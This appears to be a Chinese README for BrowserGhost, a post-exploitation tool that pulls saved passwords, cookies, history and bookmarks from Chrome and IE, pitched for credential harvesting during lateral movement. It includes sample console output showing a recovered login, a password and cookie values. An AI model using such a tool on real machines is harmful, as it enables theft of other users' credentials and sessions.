BrowserGhost抓取浏览器密码的工具

BrowserGhost

介绍：

这是一个抓取浏览器密码的工具，后续会添加更多功能

当前已经完成的功能：

实现system抓机器上其他用户的浏览器密码(方便横向移动时快速凭据采集)

用.net2 实现可兼容大部分windows，并去掉依赖(不需要System.Data.SQLite.dll这些累赘)

可以解密chrome全版本密码(chrome80版本后加密方式变了)

Chrome已经可以获取login data、cookie、history、book了

IE 支持获取书签、密码、history了 (.net2提取密码太复杂了代码参考至https://github.com/djhohnstein/SharpWeb/raw/master/Edge/SharpEdge.cs)

即将去做:

system权限下获取IE History有点问题

优化输出

监控实时cookie

兼容其他主流浏览器(firefox、360极速浏览器等)

C:\Users\Administrator\Desktop>BrowserGhost.exe[+] Current user Administrator[*] [4764] [explorer] [Administrator][*] Impersonate user Administrator[*] Current user Administrator===============Chrome=============

[*]Get Chrome Login Data [+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp [URL] -> https://xui.ptlogin2.qq.com/cgi-bin/xlogin [USERNAME] -> n0thing@gmail.com [PASSWORD] -> Iloveprettygirls

[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp

[*]Get Chrome Bookmarks{ 'checksum': 'eee70b132cc4f9644d01f989e18fdb38', 'roots': { 'bookmark_bar': { 'children': [ { 'date_added': '13236861887917624', 'guid': 'c5df2041-d745-4173-af39-b5c48f8d98a2', 'id': '5', 'name': 'GitHub', 'type': 'url', 'url': 'https://github.com/' } ], 'date_added': '13236861618031351', 'date_modified': '13236861887917624', 'guid': '00000000-0000-4000-a000-000000000002', 'id': '1', 'name': '书签栏', 'type': 'folder' }, 'other': { 'children': [ ], 'date_added': '13236861618031378', 'date_modified': '0', 'guid': '00000000-0000-4000-a000-000000000003', 'id': '2', 'name': '其他书签', 'type': 'folder' }, 'synced': { 'children': [ ], 'date_added': '13236861618031381', 'date_modified': '0', 'guid': '00000000-0000-4000-a000-000000000004', 'id': '3', 'name': '移动设备书签', 'type': 'folder' } }, 'version': 1}

[*]Get Chrome Cookie [+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp [github.com] _device_id=516175fxxxxxxxxx90133c2 [.github.com] _octo=GH1.1.3xxxxxxxxx5173 [.google.com] NID=204=DEIRBPT8FML_IsHGv1B2xxxxxxxxxxxxxxxxxxxSRlaNRV3-nfhFV8aHAgO6Smtf4JXQqR-W63p0KOVKgVd0VCXv4bKww97DEhc-PI1sVdbD4hGOuVwchN4Bwo-V61AtfjZM [+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp

[*]Get Chrome History [+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp http://github.com/ The world’s leading software development platform · GitHub https://github.com/ GitHub https://github.com/login Sign in to GitHub · GitHub

[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp===============IE=============

[*]Get IE Books C:\Users\Administrator\Favorites\Sign in to GitHub · GitHub.url URL=https://github.com/session

[*]Get IE Password Vault Type : Web Credentials Resource : https://github.com/ Identity : n0thing@gmail.com Credential : Iloveprettygirls LastModified : 2020/6/17 7:08:50

[*]Get IE History https://github.com/login https://github.com/join https://github.com/john https://github.com/sign http://github.com/ http://go.microsoft.com/fwlink/p/?LinkId=255141[*] Recvtoself[*] Current user Administrator

项目地址：https://github.com/QAX-A-Team/BrowserGhost